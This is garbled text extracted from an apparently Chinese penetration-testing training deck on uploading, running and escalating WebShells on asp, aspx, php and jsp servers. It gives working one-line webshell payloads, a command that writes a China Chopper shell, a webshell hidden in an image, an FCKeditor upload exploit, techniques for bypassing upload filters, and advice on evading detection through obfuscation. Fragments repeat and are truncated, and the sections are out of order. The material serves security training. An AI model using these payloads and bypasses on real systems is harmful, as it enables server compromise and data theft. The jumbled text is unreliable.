è)表的特性，因此aspx環(huán)境下運(yùn)行命令方法更加靈活，常見(jiàn)的如下：Process.Start()方法wscript.shell組件shell.application組件在aspx環(huán)境下運(yùn)行命令與VBScript與JavaScrProcess.Start()方法Process.Start()方法的作用是啟動(dòng)（或重用）此process組件的StartInfo屬性指定的進(jìn)程資源，并將其與該組件關(guān)聯(lián)。服務(wù)器端aspx_process.aspx部分代碼如下圖所示Process.Start()方法Process.StartProcess.Start()方法輸入：http://[IP]/aspx_process.aspx，頁(yè)面返回如下圖從上圖紅框處可知，服務(wù)器端程序執(zhí)行了用戶輸入的命令。Process.Start()方法輸入：http://[IP使用wsipt.shell組件服務(wù)器端aspx_wsipt.aspx部分如下圖所示輸入：http://[IP]/aspx_wsipt.aspx，可知命令得了執(zhí)行，具體如下圖使用wsipt.shell組件服務(wù)器端aspx_wsipt.使用shell.application組件服務(wù)器端aspx_shell.aspx代碼如下使用shell.application組件服務(wù)器端aspx使用shell.application組件輸入：http://[IP]/aspx_shell.aspx，頁(yè)面返回如下圖所示上圖輸入命令/cecho^<%evalrequest(“chopper”)%^>>>C:\test1\WebShell\123.asp”，向服務(wù)器應(yīng)用程序目錄下寫入菜刀一句話木馬，使用菜刀連接一句話木馬，如下圖所示使用shell.application組件輸入：http:在php環(huán)境下運(yùn)行命令與asp、aspx相比，php功能更加強(qiáng)大，使用更加靈活，主要包括如下：使用自身函數(shù)使用wsipt.shell組件在php環(huán)境下運(yùn)行命令與asp、aspx相比，php功能更使用自身函數(shù)該方法中使用的函數(shù)使用方法類似，都是把用戶提交的參數(shù)傳到這些函數(shù)，然后該函數(shù)執(zhí)行用戶提交的命令，這里寫到一個(gè)程序php_fuction.php中，具體如下圖所示：使用自身函數(shù)該方法中使用的函數(shù)使用方法類似，都是把用戶提交的使用自身函數(shù)上圖圖列出了使用函數(shù)system()、exec()、passthru()、shell_exec()、popen()、proc_open()執(zhí)行系統(tǒng)命令方式。接下以system為例（其它類似）輸入：http://[IP]/php_fuction.php?system=dir，頁(yè)面返回如下圖。使用自身函數(shù)上圖圖列出了使用函數(shù)system()、exec(使用wsipt.shell組件服務(wù)器端php_wsipt.php如下圖所示。輸入：http://[IP]/php_wsipt.php?wscript=dir，頁(yè)面返回如下圖所示。使用wsipt.shell組件服務(wù)器端php_wsipt.p在jsp環(huán)境下運(yùn)行命令Jsp環(huán)境下執(zhí)行系統(tǒng)命令一般使用Runtime.getRuntime().exec(command)方法，服務(wù)器端jsp_fuction.jsp如下圖：在jsp環(huán)境下運(yùn)行命令Jsp環(huán)境下執(zhí)行系統(tǒng)命令一般使用Ru在jsp環(huán)境下運(yùn)行命令Jsp環(huán)境下執(zhí)行系統(tǒng)命令一般使用Runtime.getRuntime().exec(command)方法，服務(wù)器端jsp_fuction.jsp如下圖：輸入：http://[IP]/jsp_fuction.jsp?cmd=ipconfig，頁(yè)面返回如下圖在jsp環(huán)境下運(yùn)行命令Jsp環(huán)境下執(zhí)行系統(tǒng)命令一般使用Ru在其它腳本環(huán)境下運(yùn)行命令除了上述介紹的asp、aspx、php、jsp先如今比較流行的環(huán)境外，還有CGI等環(huán)境下，由于這些環(huán)境現(xiàn)在使用較少，不做詳細(xì)敘述，以perl的system()函數(shù)為，服務(wù)器端cgi_perl.pl代碼在其它腳本環(huán)境下運(yùn)行命令除了上述介紹的asp、aspx、ph在其它腳本環(huán)境下運(yùn)行命令接下來(lái)輸入：http://[IP]/cgi_perl.pl，頁(yè)面返回如下圖在其它腳本環(huán)境下運(yùn)行命令接下來(lái)輸入：http://[IP]/WebShell提權(quán)WebShell提權(quán)簡(jiǎn)介利用開(kāi)放的服務(wù)提權(quán)利用軟件特性提權(quán)利用軟件溢出提權(quán)利用宿主系統(tǒng)DLL提權(quán)利用DBA提權(quán)利用HASH提權(quán)利用網(wǎng)絡(luò)嗅探提權(quán)利用系統(tǒng)及軟件漏洞提權(quán)社會(huì)工程學(xué)提權(quán)簡(jiǎn)介利用開(kāi)放的服務(wù)提權(quán)利用開(kāi)放的服務(wù)提權(quán)當(dāng)獲得WebShell后，首先應(yīng)該先查看下宿主系統(tǒng)開(kāi)啟了哪些服務(wù)，這些服務(wù)很可能方便的提供系統(tǒng)權(quán)限提升的機(jī)會(huì)，這些服務(wù)包括：ftp、pcanywhere、遠(yuǎn)程桌面、vnc、ssh等。這些服務(wù)一般情況下是為了方便管理員維護(hù)服務(wù)使用，所以權(quán)限相對(duì)較高，如果其采用了弱密碼，則可以輕松獲得權(quán)限提升。利用開(kāi)放的服務(wù)提權(quán)當(dāng)獲得WebShell后，首先應(yīng)該先查看下利用軟件特性提權(quán)這里主要指利用宿主系統(tǒng)的WEB應(yīng)用軟件特性，諸如命令執(zhí)行、權(quán)限控制、目錄訪問(wèn)、目錄穿越、配置特點(diǎn)等來(lái)提升權(quán)限，由于該方法局限性太強(qiáng)，不做詳細(xì)介紹。利用軟件特性提權(quán)這里主要指利用宿主系統(tǒng)的WEB應(yīng)用軟件特性，利用宿主系統(tǒng)DLL提權(quán)這種方法使用Windows2003的IIS服務(wù)自帶的基于命令行下的IIS管理腳本文件是Adsutil.vbs，將目標(biāo)DLL加入到特權(quán)行列從而獲得權(quán)限的提升。利用宿主系統(tǒng)DLL提權(quán)這種方法使用Windows2003的利用DBA提權(quán)利用DBA提權(quán)的方法一般適合SQL注入滲透的情況，在獲取了主機(jī)數(shù)據(jù)庫(kù)權(quán)限后可以通過(guò)特定數(shù)據(jù)庫(kù)的特定函數(shù)和方法將應(yīng)用程序或者配置文件寫入到特定目錄里，從而實(shí)現(xiàn)提權(quán)。利用DBA提權(quán)利用DBA提權(quán)的方法一般適合SQL注入滲透的情利用HASH提權(quán)該方法是破解系統(tǒng)中hash加密的用戶名或者密碼從而獲取權(quán)限的提升，針對(duì)hash的破解可分針對(duì)系統(tǒng)hash的破解（windows:sam文件、類Unix:passwd/shadow文件）和針對(duì)宿主軟件hash的破解。利用HASH提權(quán)該方法是破解系統(tǒng)中hash加密的用戶名或者密利用系統(tǒng)軟件這里主要是利用操作系統(tǒng)的一些邏輯錯(cuò)誤、解析漏洞、DLL劫持以及應(yīng)用系統(tǒng)漏洞進(jìn)行提權(quán)。利用系統(tǒng)軟件這里主要是利用操作系統(tǒng)的一些邏輯錯(cuò)誤、解析漏洞、利用網(wǎng)絡(luò)嗅探提權(quán)網(wǎng)絡(luò)嗅探可以直接獲取各種服務(wù)在網(wǎng)絡(luò)上的用戶名、密碼或者h(yuǎn)ash，甚至是cookie劫持，從而獲得權(quán)限的提升。利用網(wǎng)絡(luò)嗅探提權(quán)網(wǎng)絡(luò)嗅探可以直接獲取各種服務(wù)在網(wǎng)絡(luò)上的用戶名社會(huì)工程學(xué)提權(quán)社會(huì)工程學(xué)提權(quán)是相對(duì)比較高效的提權(quán)方法。它主要通過(guò)分析主機(jī)使用者的社會(huì)關(guān)系、使用習(xí)慣及使用環(huán)境規(guī)律等綜合分析出關(guān)鍵字集合，通過(guò)一定的組合運(yùn)算用于系統(tǒng)服務(wù)密碼的破解。社會(huì)工程學(xué)提權(quán)社會(huì)工程學(xué)提權(quán)是相對(duì)比較高效的提權(quán)方法。它主要防御與逃逸防御與逃逸簡(jiǎn)介防御逃逸簡(jiǎn)介防御防御目前防火墻中有防御WebShell的特征，主要是從WebShell的上傳以及響應(yīng)兩個(gè)方面進(jìn)行阻斷。防御目前防火墻中有防御WebShell的特征，主要是從Web逃逸常見(jiàn)逃逸方法如下：加密敏感代碼：使用諸如vbscrip.encode,、jscrip.encode、javascrip.encode、base64_decode、gzinflate、gzuncompress、str_rot13等加密一些敏感代碼逃逸被查殺。修改源碼：有時(shí)候通過(guò)更改變量名、函數(shù)名也可以達(dá)到免殺的目的。逃逸常見(jiàn)逃逸方法如下：工具工具簡(jiǎn)介中國(guó)菜刀海陽(yáng)頂端ASP木馬C/S模式轉(zhuǎn)換器簡(jiǎn)介中國(guó)菜刀中國(guó)菜刀中國(guó)菜刀是菜刀作者從之前的WebShell管理器的基礎(chǔ)上修改而來(lái)的功能更加強(qiáng)大，該工具主要功能是連接asp、aspx、php、jsp一句話木馬并提供了文件管理、虛擬終端、數(shù)據(jù)庫(kù)管理等常見(jiàn)功能，另外該工具還提供了安全掃描、定時(shí)提醒、快速啟動(dòng)、瀏覽器等實(shí)用小功能，其中安全掃描功能很強(qiáng)大，掃描速度很快。中國(guó)菜刀中國(guó)菜刀是菜刀作者從之前的WebShell管理器的基海陽(yáng)頂端ASP木馬C/S模式轉(zhuǎn)換器使用海陽(yáng)頂端ASP木馬C/S模式轉(zhuǎn)換器可以自動(dòng)生成服務(wù)器端一句話木馬程序以及客戶端程序。打開(kāi)海陽(yáng)頂端2006α版目錄下2006X.exe文件，如下圖使用圖上圖

“打開(kāi)”按鈕選擇要上傳的大馬，點(diǎn)擊轉(zhuǎn)換即可生成客戶端2006.asp.htm，接著點(diǎn)擊“生成服務(wù)器端頁(yè)面”按鈕即可生成服務(wù)器端sever.asp一句話木馬，先上傳sever.asp到服務(wù)器端，然后利用2005.asp.htm連接sever.asp上傳大馬。海陽(yáng)頂端ASP木馬C/S模式轉(zhuǎn)換器使用海陽(yáng)頂端ASP木馬C總結(jié)總結(jié)總結(jié)本文首先研究了繞過(guò)各種主流限制上傳WebShell方法，包括繞過(guò)客戶以及服務(wù)器端限制上傳WebShell、利用寫入過(guò)濾不全上傳WebShell、利用主流服務(wù)器漏洞上傳WebShell、利用sql注入上傳WebShell、利用WebDAV上傳WebShell、利用.htaccess文件上傳WebShell。其次，介紹執(zhí)行WebShell，由于命令執(zhí)行時(shí)WebShell比較基礎(chǔ)又比較復(fù)雜部分，因此單獨(dú)拿出來(lái)進(jìn)行研究，主要研究了分別在asp、aspx、php、jsp等環(huán)境下執(zhí)行系統(tǒng)命令的方法并進(jìn)行了實(shí)驗(yàn)?？偨Y(jié)本文首先研究了繞過(guò)各種主流限制上傳WebShell方法，總結(jié)

接下來(lái)，介紹了主流WebShell的提取方法，包括利用開(kāi)發(fā)的服務(wù)器提權(quán)、利用軟件特性提權(quán)、利用軟件溢出提權(quán)、利用宿主系統(tǒng)dll提權(quán)、利用dba提權(quán)、利用hash提權(quán)、利用網(wǎng)絡(luò)嗅探提權(quán)、利用系統(tǒng)以及軟件漏洞提權(quán)、社會(huì)工程提權(quán)。最后簡(jiǎn)單介紹了下AF庫(kù)防御WebShell的方法、常見(jiàn)的WebShell逃逸方法以及WebShell利用工具?？偨Y(jié)

接下來(lái)，介紹了主流WebShell的提取方法，深信服應(yīng)用層安全培訓(xùn)-Web滲透測(cè)試系列-X-文課件深信服應(yīng)用層安全培訓(xùn)-Web滲透測(cè)試系列-X-文課件Web滲透測(cè)試系列_X_WebShell上傳Web滲透測(cè)試系列_X_WebShell上傳整體框架WebShell上傳探測(cè)階段WebShell上傳利用階段執(zhí)行WebShellWebShell提權(quán)防御與逃逸常用工具總結(jié)培訓(xùn)提綱整體框架培訓(xùn)提綱整體框架整體框架概述WebShell上傳主要包括探測(cè)和利用階段，具體如下：探測(cè)階段：該階段主要是搜集可測(cè)試點(diǎn)，以方便下一步的利用。利用階段：該階段主要是利用探測(cè)的漏洞上傳并執(zhí)行WebShell。概述WebShell上傳主要包括探測(cè)和利用階段，具體如下：WebShell上傳滲透測(cè)試框架WebShell上傳滲透測(cè)試框架WebShell上傳探測(cè)階段WebShell上傳探測(cè)階段WebShell上傳探測(cè)階段原理說(shuō)明收集過(guò)程WebShell上傳探測(cè)階段原理說(shuō)明原理說(shuō)明上傳探測(cè)階段沒(méi)有什么原理，主要是搜集可探測(cè)點(diǎn)，常見(jiàn)的可測(cè)試點(diǎn)包括應(yīng)用程序上傳功能（諸如上傳頭像、附件上傳等）、用戶可控的輸入點(diǎn)或者參數(shù)（頁(yè)面POST表單部分、url參數(shù)、sql注入點(diǎn)等）、HTTP開(kāi)啟的方法（諸如WebDAV）等，收集可測(cè)試點(diǎn)的過(guò)程中，應(yīng)盡量確保覆蓋范圍，不遺漏每一個(gè)可測(cè)試點(diǎn)，搜集過(guò)程推薦使用WVS工具spider功能。原理說(shuō)明上傳探測(cè)階段沒(méi)有什么原理，主要是搜集可探測(cè)點(diǎn)，常見(jiàn)的收集過(guò)程利用WVS的spider工具收集可測(cè)試點(diǎn)，如下圖：spider發(fā)現(xiàn)了危險(xiǎn)的上傳目錄（紅框1處）、開(kāi)啟了WebDAV方法等漏洞，根據(jù)掃描結(jié)果方便接下來(lái)依據(jù)不同結(jié)果進(jìn)行利用。另外有些可測(cè)試點(diǎn)WVS的spider是爬不出來(lái)，包括內(nèi)斂sql注入點(diǎn)、不允許爬蟲(chóng)掃描的上傳目錄等，這些只能靠手工探測(cè)。收集過(guò)程利用WVS的spider工具收集可測(cè)試點(diǎn)，如下圖：WebShell上傳利用階段WebShell上傳利用階段簡(jiǎn)介直接上傳WebShell繞過(guò)客戶端檢測(cè)上傳WebShell繞過(guò)服務(wù)端文件擴(kuò)展名檢測(cè)上傳WebShell繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell繞過(guò)文件內(nèi)容檢測(cè)上傳WebShell繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell利用服務(wù)器漏洞上傳WebShell利用sql注入上傳WebShell利用WebDAV上傳WebShell利用.htaccess文件上傳WebShell簡(jiǎn)介直接上傳WebShell直接上傳WebShell探測(cè)到上傳點(diǎn)后，接下來(lái)進(jìn)入上傳WebShell步驟，假如服務(wù)器端對(duì)用戶提交參數(shù)或者文件沒(méi)有進(jìn)行過(guò)濾或者過(guò)濾不當(dāng)，則能夠直接上傳WebShell，那么接下來(lái)進(jìn)入執(zhí)行WebShell步驟即可。直接上傳WebShell探測(cè)到上傳點(diǎn)后，接下來(lái)進(jìn)入上傳Web繞過(guò)客戶端檢測(cè)上傳WebShell客戶端檢測(cè)即通過(guò)用戶請(qǐng)求返回頁(yè)面部分的js腳本驗(yàn)證用戶的輸入，該檢測(cè)在客戶端檢測(cè)，具有該檢測(cè)方法的明顯表現(xiàn)是在用戶上傳文件到服務(wù)器之前客戶端js會(huì)進(jìn)行檢測(cè)，假如不符合檢測(cè)要求會(huì)提示相應(yīng)錯(cuò)誤，接下來(lái)舉例說(shuō)明，并列舉出相應(yīng)的繞過(guò)方法。繞過(guò)客戶端檢測(cè)上傳WebShell客戶端檢測(cè)即通過(guò)用戶請(qǐng)求返繞過(guò)客戶端檢測(cè)上傳WebShell服務(wù)器端含有檢測(cè)js腳本的文件UPLOAD_CS_1.aspx代碼如下圖上圖紅框1處是服務(wù)器端返回用戶請(qǐng)求頁(yè)面中用于檢測(cè)客戶端上傳文件類型的js腳本，該客戶端驗(yàn)證要求只能上傳.txt和.docx兩種類型，紅框2處是使用onmouseover事件觸發(fā)check_file函數(shù)。繞過(guò)客戶端檢測(cè)上傳WebShell服務(wù)器端含有檢測(cè)js腳本的繞過(guò)客戶端檢測(cè)上傳WebShell輸入：http://[IP]/UPLOAD_CS_1.aspx，同時(shí)上傳1.jpg文件，頁(yè)面返回如下圖：繞過(guò)客戶端檢測(cè)上傳WebShell輸入：http://[IP繞過(guò)客戶端檢測(cè)上傳WebShell上圖中鼠標(biāo)剛放到“上傳文件”按鈕便彈出了一個(gè)警告對(duì)話框，由此易知這種情況是客戶端js檢驗(yàn)，查看返回頁(yè)面的的源代碼：如上圖可以確定此種情況是客戶端js驗(yàn)證。繞過(guò)客戶端檢測(cè)上傳WebShell上圖中鼠標(biāo)剛放到“上傳文件繞過(guò)客戶端檢測(cè)上傳WebShell接下來(lái)使用代理工具繞過(guò)客戶端驗(yàn)證，例如上傳1.asp文件，先將文件名改為1.txt，代開(kāi)burpsuite代理工具，點(diǎn)擊“上傳文件”按鈕，burpsuite截獲如下圖：繞過(guò)客戶端檢測(cè)上傳WebShell接下來(lái)使用代理工具繞過(guò)客戶繞過(guò)客戶端檢測(cè)上傳WebShell把上圖紅框處1.txt改為1.asp，然后點(diǎn)擊“forward”按鈕，查看服務(wù)器端Files文件夾，如下圖。從上圖可以得出結(jié)論利用代理工具成功繞過(guò)客戶端驗(yàn)證繞過(guò)客戶端檢測(cè)上傳WebShell把上圖紅框處1.txt改為繞過(guò)服務(wù)端文件擴(kuò)展名檢測(cè)上傳WebShell服務(wù)器端文件擴(kuò)展名檢測(cè)是指服務(wù)器端應(yīng)用程序通過(guò)檢測(cè)用戶上傳文件的后綴名從而做出允許或者阻止的一種方法，該方法包含黑名單和白名單兩種形式，具體如下：黑名單檢測(cè)：一般是建立一個(gè)專門的blacklist文件，里面枚舉常見(jiàn)的危險(xiǎn)文件后綴。白名單檢測(cè)：一般是定義一個(gè)允許或者阻止用戶上傳文件類型的后綴的文件，里面枚舉相應(yīng)的文件后綴。繞過(guò)服務(wù)端文件擴(kuò)展名檢測(cè)上傳WebShell服務(wù)器端文件擴(kuò)展繞過(guò)黑名單檢測(cè)方法文件名大小寫繞過(guò)用向AsP、Aspx之類的文件名繞過(guò)黑名單檢測(cè)；名單列表繞過(guò)用黑名單里沒(méi)有的名單進(jìn)行攻擊，iis默認(rèn)執(zhí)行.asp、.asa、.cer，有時(shí)候黑名單過(guò)濾不全沒(méi)有過(guò)濾掉像后綴為asa、cer之類的，但這些文件可以像asp文件一樣執(zhí)行，此時(shí)可以使用這些后綴繞過(guò)黑名單。繞過(guò)黑名單檢測(cè)方法文件名大小寫繞過(guò)繞過(guò)黑名單檢測(cè)方法特殊文件名繞過(guò)比如發(fā)送的HTTP包里把文件名改成test.asp.或test.asp_(下劃線為空格)，這兩種命名方式在windows系統(tǒng)里是不被允許的，所以需要在代理工具burpsuite進(jìn)行修改，然后繞過(guò)驗(yàn)證后，會(huì)被windows系統(tǒng)自動(dòng)去掉后面的點(diǎn)和空格，但注意Unix/Linux系統(tǒng)沒(méi)有此特性。0x00截?cái)嘣谠S多語(yǔ)言的常用字符串處理函數(shù)中，0x00被認(rèn)為是終止符，比如應(yīng)用只允許上傳jpg圖片，那么可以構(gòu)造文件名為2.asp%00.jpg，.jpg繞過(guò)了應(yīng)用的上傳文件類型判斷，但對(duì)于服務(wù)器來(lái)說(shuō)，此文件因?yàn)?00字符截?cái)嗟年P(guān)系，最終會(huì)以2.asp存入路徑里。繞過(guò)黑名單檢測(cè)方法特殊文件名繞過(guò)繞過(guò)白名單檢測(cè)方法0x00截?cái)嗷诎酌麊螜z查主要使用0x00截?cái)嗬@過(guò)，同黑名單0x00截?cái)嗬@過(guò)，接下來(lái)舉例說(shuō)明。服務(wù)器端白名單檢測(cè)文件為UPLOAD_CS.aspx.cs，部分代碼如下圖繞過(guò)白名單檢測(cè)方法0x00截?cái)嗬@過(guò)白名單檢測(cè)方法上圖紅框處枚舉了允許上傳gif、GIF、swf、SWF后綴文件，該部分為該代碼的白名單檢測(cè)部分，同時(shí)該文件用白名單規(guī)定了不允許上傳后綴文件，如下圖如上圖可以看出使用了白名單規(guī)定了不允許上傳后綴為asp、aspx以及dll的文件，接下來(lái)實(shí)驗(yàn)使用%00繞過(guò)驗(yàn)證，具體如下繞過(guò)白名單檢測(cè)方法上圖紅框處枚舉了允許上傳gif、GIF、s繞過(guò)白名單檢測(cè)方法輸入：http://[IP]/UPLOAD_CS_2.aspx，如果直接上傳2.asp文件，頁(yè)面返回如下圖上圖顯示上傳后綴為asp的文件失敗，把上傳文件名改為2.asp.%00.jpg，繼續(xù)上傳，頁(yè)面返回如圖繞過(guò)白名單檢測(cè)方法輸入：http://[IP]/UPLOAD繞過(guò)白名單檢測(cè)方法上圖顯示上傳后綴為asp的文件失敗，把上傳文件名改為2.asp.%00.jpg，繼續(xù)上傳，頁(yè)面返回如圖從上圖可以得出結(jié)論成功上傳2.asp%00.jpg文件，.jpg繞過(guò)了應(yīng)用的白名單檢測(cè)，但對(duì)于服務(wù)器來(lái)說(shuō)，由于后臺(tái)某些函數(shù)作用（諸如CreateTextFile()），此文件會(huì)被%00字符截?cái)啵罱K會(huì)以2.asp存入路徑里。繞過(guò)白名單檢測(cè)方法上圖顯示上傳后綴為asp的文件失敗，把上傳繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell有時(shí)候僅僅對(duì)文件名后綴進(jìn)行判斷并不能有效阻止惡意文件的上傳（比如某服務(wù)器只允許上傳jpg文件格式，不允許上傳后綴為php等文件，但是把后綴為php改為后綴為jpg上傳到服務(wù)器，某些情況下也能執(zhí)行上傳文件），因此對(duì)文件格式進(jìn)行檢測(cè)十分必要，也就是服務(wù)器端MIME類型檢測(cè)。服務(wù)器端MIME類型檢測(cè)asp、aspx利用response對(duì)象的ContentType屬性，php利用$_FILES[‘userfile’][‘type’]、jsp也使用response對(duì)象的ContentType屬性（與asp類似）。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell有時(shí)候僅僅對(duì)文繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell接下來(lái)以aspx為例通過(guò)檢測(cè)http包的content-type字段的值來(lái)判斷上傳文件是否合法，實(shí)驗(yàn)使用的服務(wù)器端文件為mime.aspx，部分代碼如下圖。上圖紅框處使用POSTFile對(duì)象的ContentType屬性，限定只允許上傳application/zip類型。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell接下來(lái)以asp繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell輸入：http://[IP]/mime.aspx，上傳文件2.asp文件，頁(yè)面返回如下圖。上圖返回錯(cuò)誤頁(yè)面，提示“不支持的mime文件”，接下來(lái)使用burpsuite攔截請(qǐng)求，如下圖。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell輸入：http繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell修改圖上圖中紅框處為application/zip，再次上傳2.asp文件，查看files文件夾（該文件夾為上傳文件默認(rèn)目錄），頁(yè)面返回下圖。上圖頁(yè)面返回顯示2.asp文件上傳成功。繞過(guò)服務(wù)端MIME類型檢測(cè)上傳WebShell修改圖上圖中紅繞過(guò)文件內(nèi)容檢測(cè)上傳WebShell文件內(nèi)容檢測(cè)即通過(guò)檢測(cè)特定文件某些特殊標(biāo)志位來(lái)判斷是否是允許上傳的文件，比如以后綴為jpg圖片文件為例，該文件頭有一組特殊二進(jìn)制數(shù)標(biāo)識(shí)FFD8FFE000104A464946（這些二進(jìn)制數(shù)也叫文件幻數(shù)），那么就可以通過(guò)判斷上傳文件的文件頭來(lái)驗(yàn)證文件的類型。其實(shí)檢測(cè)文件幻數(shù)只是檢測(cè)的一項(xiàng)內(nèi)容，還可以對(duì)文件相關(guān)信息、文件渲染加載后檢測(cè)，面對(duì)這些檢測(cè)，可以把一句話木馬注入圖片文件最后面，這樣既實(shí)現(xiàn)了代碼注入也不會(huì)破壞圖片結(jié)構(gòu)，具體步驟如下：代碼注入圖片引用創(chuàng)建的文件使用客戶端連接一句話木馬繞過(guò)文件內(nèi)容檢測(cè)上傳WebShell文件內(nèi)容檢測(cè)即通過(guò)檢測(cè)特代碼注入圖片首先準(zhǔn)備圖片picture.jpg，然后把a(bǔ)sp一句話木馬（諸如<%execute(request(“value”))%>）插入圖片最后，如下圖所示上圖紅框1出為標(biāo)識(shí)jpg文件的幻數(shù)，紅框2處為植入的一句話木馬，把該圖片上傳到服務(wù)器端。代碼注入圖片首先準(zhǔn)備圖片picture.jpg，然后把a(bǔ)sp引用創(chuàng)建的文件同時(shí)創(chuàng)建一個(gè)引用包含一句話木馬的圖片的文件picture.asp，代碼如下：<!--#includefile="picture.jpg"-->把該文件上傳到服務(wù)器端(這里之所以先上傳jpg文件，再上傳一個(gè)引用上傳jpg的asp文件，主要目的是為了隱藏一句話木馬的目的)。引用創(chuàng)建的文件同時(shí)創(chuàng)建一個(gè)引用包含一句話木馬的圖片的文件pi使用客戶端連接一句話木馬客戶端代碼c1.html代碼如下圖：其中Adodb.Stream是ADO的Stream對(duì)象，提供存取二進(jìn)制數(shù)據(jù)或者文本流，從而實(shí)現(xiàn)對(duì)流的讀、寫和管理等操作。使用客戶端連接一句話木馬客戶端代碼c1.html代碼如下圖：使用客戶端連接一句話木馬該代碼主要是服務(wù)器端一句話木馬s1.asp接收c1.html第一個(gè)textarea里的值生成一個(gè)newmm.asp大馬文件，同時(shí)利用lP.writetextrequest("CMD")接收第二個(gè)textarea大馬內(nèi)容寫入newmm.asp文件里，這樣直接訪問(wèn)newmm.asp文件，即獲得了WebShell。使用瀏覽器打開(kāi)客戶端c1.html，如圖下圖所示使用客戶端連接一句話木馬該代碼主要是服務(wù)器端一句話木馬s1.使用客戶端連接一句話木馬上圖紅框處為海洋2005木馬，點(diǎn)擊提交后，訪問(wèn)上傳木馬，如下圖。如上圖可知上傳WebShell成功。使用客戶端連接一句話木馬上圖紅框處為海洋2005木馬，點(diǎn)擊提繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell服務(wù)器端目錄路徑檢測(cè)即對(duì)用戶提交目錄路徑參數(shù)進(jìn)行檢測(cè)，有時(shí)候檢測(cè)不夠嚴(yán)謹(jǐn)而導(dǎo)致可以用%00截?cái)噙M(jìn)行攻擊，該漏洞的本質(zhì)同黑名單檢測(cè)%00截?cái)啾举|(zhì)一樣，但該漏洞要求服務(wù)器端應(yīng)用程序具有處理用戶提交的目錄路徑參數(shù)函數(shù)，不具有通用性，這里僅介紹下原理。以fckeditorphp<=2.6.4任意文件上傳漏洞為例，存在漏洞代碼如下圖繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell服務(wù)器端目錄路徑檢繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell輸入：/fckeditor264/filemanager/connectors/php/connector.php?Command=FileUpload&Type=Image&CurrentFolder=fuck.php%00.gifHPPT/1.0CurrentFolder這個(gè)變量的值會(huì)傳到上圖有漏洞代碼ServerMapFolder($resourceType,$folderPath,$sCommand)中的形參$folderPath里，而$folderPath在這個(gè)函數(shù)中并沒(méi)做任何檢測(cè)，就傳入CombinePaths()函數(shù)，同時(shí)變量CurrentFolder中%00后面的會(huì)被截?cái)?，?shí)際上傳的是fuck.php。繞過(guò)服務(wù)端目錄路徑檢測(cè)上傳WebShell輸入：利用過(guò)濾不完全上傳WebShell利用過(guò)濾不完全把一句木馬寫入服務(wù)器端是目前得到WebShell的最為主要的方法之一，該方法分為兩步，具體如下：上傳一句話木馬：常見(jiàn)的一句話木馬分為asp一句話、aspx一句話、php一句話以及jsp一句話，它們工作原理大致類似，這里以asp一句話木馬為例，代碼為：<%executerequest("value")%>使用客戶端連接上傳大馬：客戶端代碼使用繞過(guò)文件內(nèi)容檢測(cè)上傳c1.html。利用過(guò)濾不完全上傳WebShell利用過(guò)濾不完全把一句木馬寫上傳一句話木馬使用上傳頁(yè)面上傳一句話木馬如下：上圖為上傳WebShell的上傳頁(yè)面。上傳一句話木馬使用上傳頁(yè)面上傳一句話木馬如下：使用客戶端連接上傳大馬使用瀏覽器打開(kāi)客戶端c1.html，如下圖上圖紅框處為海洋2005木馬，點(diǎn)擊提交后，訪問(wèn)上傳木馬，如圖下從上圖可知獲得了一個(gè)WebShell，其實(shí)小馬上傳成功后是不需要再上傳大馬了，通過(guò)POST表單方式傳遞給小馬照樣可以執(zhí)行大馬（即大馬在內(nèi)存中執(zhí)行），且隱藏性更強(qiáng)。使用客戶端連接上傳大馬使用瀏覽器打開(kāi)客戶端c1.html，如利用服務(wù)器漏洞上傳WebShell解析漏洞產(chǎn)生是由于webserver本身特性功能設(shè)計(jì)存在缺陷造成的漏洞，如果加以利用，將會(huì)變成威力巨大的武器，本節(jié)內(nèi)容如下：IIS6.0解析漏洞1IIS6.0解析漏洞2IIS7.0/7.5解析漏洞Apache文件解析漏洞Nginx解析漏洞利用服務(wù)器漏洞上傳WebShell解析漏洞產(chǎn)生是由于webIIS6.0解析漏洞1此洞原理是處理文件擴(kuò)展名出錯(cuò)，導(dǎo)致將/.*asp/目錄下的所有文件都作為asp文件進(jìn)行解析。此外具有此特性的不單單是類似/.*asp/目錄，還包括/.*cer/、/.*asa/、/.*cdx/、/.*cer\(此種類型瀏覽器直接輸入不允許，需要借助burpsuite工具)、/.*asa\、/.*cdx\目錄，本例子以/.*asp/目錄舉例。IIS6.0解析漏洞1此洞原理是處理文件擴(kuò)展名出錯(cuò)，導(dǎo)致將/IIS6.0解析漏洞1假如服務(wù)器端存在一個(gè)文件名為test.asp目錄，且在該目錄建立實(shí)驗(yàn)文件2.jpg，代碼如下圖：輸入：http://[IP]/test.asp/2.jpg，頁(yè)面返回如下圖所示。從上圖可知2.jpg文件被IIS6.0解釋執(zhí)行了。IIS6.0解析漏洞1假如服務(wù)器端存在一個(gè)文件名為test.IIS6.0解析漏洞2該漏洞的原理是IIS6.0不能正確夠解析文件名包含分號(hào)（;）的文件，因此諸如2.asp;xx.jpg類似的文件會(huì)被解析成2.asp可執(zhí)行文件，從而導(dǎo)致腳本被執(zhí)行。此外具有此特性的不單單是類似2.asp;xx.jpg，還包括2.cer;xx.jpg、2.asa;xx.jpg、2.cdx;xx.jpg類型，本例子以2.asp;xx.jpg類型舉例。服務(wù)器端新建立一個(gè)文件名為2.asp;xx.jpg的文件，內(nèi)容與漏洞1中2.jpg文件內(nèi)容一樣，輸入：http://[IP]/2.asp;.jpg，頁(yè)面返回如下圖。從上圖可知2.asp;xx.jpg文件得以執(zhí)行。IIS6.0解析漏洞2該漏洞的原理是IIS6.0不能正確夠解IIS7.0/7.5解析漏洞IIS7.0/7.5是對(duì)php解析時(shí)有一個(gè)解析漏洞，只要在url后面追加上字符串"/任意文件名.php"就會(huì)按照php的方式去解析，其實(shí)這個(gè)漏洞是出自php-cgi的漏洞，與IIS7.0/7.5本身無(wú)關(guān)，具體例子如下。服務(wù)器端test.jpg代碼為：<?phpecho"HelloWorld";?>輸入：http://[IP]/test.jpg/noexist.php，會(hu